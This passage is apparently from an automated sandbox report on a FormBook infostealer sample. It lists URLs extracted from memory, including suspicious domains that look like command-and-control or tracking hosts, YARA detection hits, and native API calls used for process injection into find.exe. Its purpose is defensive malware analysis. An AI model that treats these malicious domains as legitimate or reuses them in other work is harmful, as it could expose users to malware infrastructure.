72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 61 73 74 65 72 71 71 2e 70 72 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 106<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.masterqq.pro Port 80</address></body></html>0
                      Source: find.exe, 00000004.00000002.4128433138.0000000004A48000.00000004.10000000.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4127340747.00000000042A8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/px.js?ch=1
                      Source: find.exe, 00000004.00000002.4128433138.0000000004A48000.00000004.10000000.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4127340747.00000000042A8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/px.js?ch=2
                      Source: find.exe, 00000004.00000002.4128433138.0000000004A48000.00000004.10000000.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4127340747.00000000042A8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/sk-logabpstatus.php?a=cEo3ZXV6SDZ3SUlzNWF5ZlBnck1QNnhIeUxCdWwvT0ZBOTlJUlNVS
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: oPkpFmCiYVL.exe, 00000008.00000002.4129375797.00000000053CE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.incgruporxat.click
                      Source: oPkpFmCiYVL.exe, 00000008.00000002.4129375797.00000000053CE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.incgruporxat.click/rm8a/
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1700569531.0000000006244000.00000004.00000020.00020000.00000000.sdmp, QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1700732972.0000000007372000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: find.exe, 00000004.00000002.4130694654.0000000007998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: find.exe, 00000004.00000002.4128433138.0000000005090000.00000004.10000000.00040000.00000000.sdmp, find.exe, 00000004.00000002.4130233603.0000000005EA0000.00000004.00000800.00020000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4127340747.00000000048F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf
                      Source: find.exe, 00000004.00000002.4130694654.0000000007998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: find.exe, 00000004.00000002.4130694654.0000000007998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: find.exe, 00000004.00000002.4130694654.0000000007998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: find.exe, 00000004.00000002.4128433138.0000000005090000.00000004.10000000.00040000.00000000.sdmp, find.exe, 00000004.00000002.4130233603.0000000005EA0000.00000004.00000800.00020000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4127340747.00000000048F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd
                      Source: oPkpFmCiYVL.exe, 00000008.00000002.4127340747.00000000048F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                      Source: find.exe, 00000004.00000002.4130694654.0000000007998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: find.exe, 00000004.00000002.4130694654.0000000007998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: find.exe, 00000004.00000002.4130694654.0000000007998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: find.exe, 00000004.00000002.4128433138.0000000005090000.00000004.10000000.00040000.00000000.sdmp, find.exe, 00000004.00000002.4130233603.0000000005EA0000.00000004.00000800.00020000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4127340747.00000000048F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://euob.netgreencolumn.com/sxp/i/c4601e5f6cdd73216cafdd5af209201c.js
                      Source: find.exe, 00000004.00000002.4126326491.0000000002C4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: find.exe, 00000004.00000002.4126326491.0000000002C4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: find.exe, 00000004.00000002.4126326491.0000000002C4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: find.exe, 00000004.00000002.4126326491.0000000002C4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                      Source: find.exe, 00000004.00000002.4126326491.0000000002C4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfLMEM
                      Source: find.exe, 00000004.00000002.4126326491.0000000002C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                      Source: find.exe, 00000004.00000002.4126326491.0000000002C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: find.exe, 00000004.00000003.2027352785.000000000797C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                      Source: find.exe, 00000004.00000002.4128433138.0000000004D6C000.00000004.10000000.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4127340747.00000000045CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.dynadot.com/forsale/gupiao.bet?drefid=2071
                      Source: find.exe, 00000004.00000002.4130694654.0000000007998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: find.exe, 00000004.00000002.4128433138.0000000005090000.00000004.10000000.00040000.00000000.sdmp, find.exe, 00000004.00000002.4130233603.0000000005EA0000.00000004.00000800.00020000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4127340747.00000000048F0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.networksolutions.com/

                      E-Banking Fraud

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 2.2.QsBdpe1gK5.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.QsBdpe1gK5.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.1841761840.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.4126273747.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4129375797.0000000005340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.4126207300.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1849388475.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1850179249.0000000001570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0042C8C3 NtClose,2_2_0042C8C3
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132B60 NtClose,LdrInitializeThunk,2_2_01132B60
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_01132DF0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_01132C70
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011335C0 NtCreateMutant,LdrInitializeThunk,2_2_011335C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01134340 NtSetContextThread,2_2_01134340
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01134650 NtSuspendThread,2_2_01134650
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132B80 NtQueryInformationFile,2_2_01132B80
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132BA0 NtEnumerateValueKey,2_2_01132BA0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132BF0 NtAllocateVirtualMemory,2_2_01132BF0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132BE0 NtQueryValueKey,2_2_01132BE0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132AB0 NtWaitForSingleObject,2_2_01132AB0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132AD0 NtReadFile,2_2_01132AD0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132AF0 NtWriteFile,2_2_01132AF0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132D10 NtMapViewOfSection,2_2_01132D10
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132D00 NtSetInformationFile,2_2_01132D00
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132D30 NtUnmapViewOfSection,2_2_01132D30
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132DB0 NtEnumerateKey,2_2_01132DB0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132DD0 NtDelayExecution,2_2_01132DD0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132C00 NtQueryInformationProcess,2_2_01132C00
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132C60 NtCreateKey,2_2_01132C60
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132CA0 NtQueryInformationToken,2_2_01132CA0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132CC0 NtQueryVirtualMemory,2_2_01132CC0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132CF0 NtOpenProcess,2_2_01132CF0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132F30 NtCreateSection,2_2_01132F30
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132F60 NtCreateProcessEx,2_2_01132F60
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132F90 NtProtectVirtualMemory,2_2_01132F90
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132FB0 NtResumeThread,2_2_01132FB0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132FA0 NtQuerySection,2_2_01132FA0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132FE0 NtCreateFile,2_2_01132FE0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132E30 NtWriteVirtualMemory,2_2_01132E30
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132E80 NtReadVirtualMemory,2_2_01132E80
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132EA0 NtAdjustPrivilegesToken,2_2_01132EA0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01132EE0 NtQueueApcThread,2_2_01132EE0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01133010 NtOpenDirectoryObject,2_2_01133010
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01133090 NtSetValueKey,2_2_01133090
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011339B0 NtGetContextThread,2_2_011339B0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01133D10 NtOpenProcessToken,2_2_01133D10
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01133D70 NtOpenThread,2_2_01133D70
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F4340 NtSetContextThread,LdrInitializeThunk,4_2_030F4340
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F4650 NtSuspendThread,LdrInitializeThunk,4_2_030F4650
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2B60 NtClose,LdrInitializeThunk,4_2_030F2B60
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_030F2BA0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2BE0 NtQueryValueKey,LdrInitializeThunk,4_2_030F2BE0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_030F2BF0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2AD0 NtReadFile,LdrInitializeThunk,4_2_030F2AD0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2AF0 NtWriteFile,LdrInitializeThunk,4_2_030F2AF0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2F30 NtCreateSection,LdrInitializeThunk,4_2_030F2F30
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2FB0 NtResumeThread,LdrInitializeThunk,4_2_030F2FB0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2FE0 NtCreateFile,LdrInitializeThunk,4_2_030F2FE0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_030F2E80
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2EE0 NtQueueApcThread,LdrInitializeThunk,4_2_030F2EE0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2D10 NtMapViewOfSection,LdrInitializeThunk,4_2_030F2D10
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_030F2D30
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2DD0 NtDelayExecution,LdrInitializeThunk,4_2_030F2DD0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_030F2DF0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2C60 NtCreateKey,LdrInitializeThunk,4_2_030F2C60
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_030F2C70
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_030F2CA0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F35C0 NtCreateMutant,LdrInitializeThunk,4_2_030F35C0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F39B0 NtGetContextThread,LdrInitializeThunk,4_2_030F39B0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2B80 NtQueryInformationFile,4_2_030F2B80
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2AB0 NtWaitForSingleObject,4_2_030F2AB0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2F60 NtCreateProcessEx,4_2_030F2F60
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2F90 NtProtectVirtualMemory,4_2_030F2F90
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2FA0 NtQuerySection,4_2_030F2FA0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2E30 NtWriteVirtualMemory,4_2_030F2E30
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2EA0 NtAdjustPrivilegesToken,4_2_030F2EA0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2D00 NtSetInformationFile,4_2_030F2D00
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2DB0 NtEnumerateKey,4_2_030F2DB0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2C00 NtQueryInformationProcess,4_2_030F2C00
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2CC0 NtQueryVirtualMemory,4_2_030F2CC0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2CF0 NtOpenProcess,4_2_030F2CF0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F3010 NtOpenDirectoryObject,4_2_030F3010
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F3090 NtSetValueKey,4_2_030F3090
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F3D10 NtOpenProcessToken,4_2_030F3D10
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F3D70 NtOpenThread,4_2_030F3D70
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_008C9370 NtCreateFile,4_2_008C9370
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_008C94D0 NtReadFile,4_2_008C94D0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_008C95C0 NtDeleteFile,4_2_008C95C0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_008C9660 NtClose,4_2_008C9660
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_008C97B0 NtAllocateVirtualMemory,4_2_008C97B0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_02FAF996 NtClose,4_2_02FAF996
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_0305D63C0_2_0305D63C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_0730AA580_2_0730AA58
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_073055D80_2_073055D8
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_073071500_2_07307150
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_073051A00_2_073051A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07304D680_2_07304D68
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_073068780_2_07306878
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E4D7080_2_07E4D708
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E4DCFE0_2_07E4DCFE
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E4DC280_2_07E4DC28
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E4AA600_2_07E4AA60
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E4A7C80_2_07E4A7C8
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E4A7B80_2_07E4A7B8
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E4D7070_2_07E4D707
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E4DC1A0_2_07E4DC1A
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E4AA4F0_2_07E4AA4F
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_004188132_2_00418813
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0041000B2_2_0041000B
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_004100132_2_00410013
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_00416A012_2_00416A01
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_00416A032_2_00416A03
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0040E2092_2_0040E209
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0040E2132_2_0040E213
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_004102332_2_00410233
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0040E3572_2_0040E357
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0040E3632_2_0040E363
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0040238E2_2_0040238E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_004023902_2_00402390
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0042EEB32_2_0042EEB3
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_00402FF02_2_00402FF0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0119A1182_2_0119A118
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010F01002_2_010F0100
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011881582_2_01188158
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C01AA2_2_011C01AA
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011B41A22_2_011B41A2
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011B81CC2_2_011B81CC
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011920002_2_01192000
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011BA3522_2_011BA352
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0110E3F02_2_0110E3F0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C03E62_2_011C03E6
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A02742_2_011A0274
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011802C02_2_011802C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011005352_2_01100535
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011C05912_2_011C0591
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011A44202_2_011A4420
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011B24462_2_011B2446
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011AE4F62_2_011AE4F6
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011247502_2_01124750
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011007702_2_01100770
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010FC7C02_2_010FC7C0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0111C6E02_2_0111C6E0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011169622_2_01116962
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011029A02_2_011029A0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011CA9A62_2_011CA9A6
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0110A8402_2_0110A840
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011028402_2_01102840
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010E68B82_2_010E68B8
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0112E8F02_2_0112E8F0
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011BAB402_2_011BAB40
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_011B6BD72_2_011B6BD7
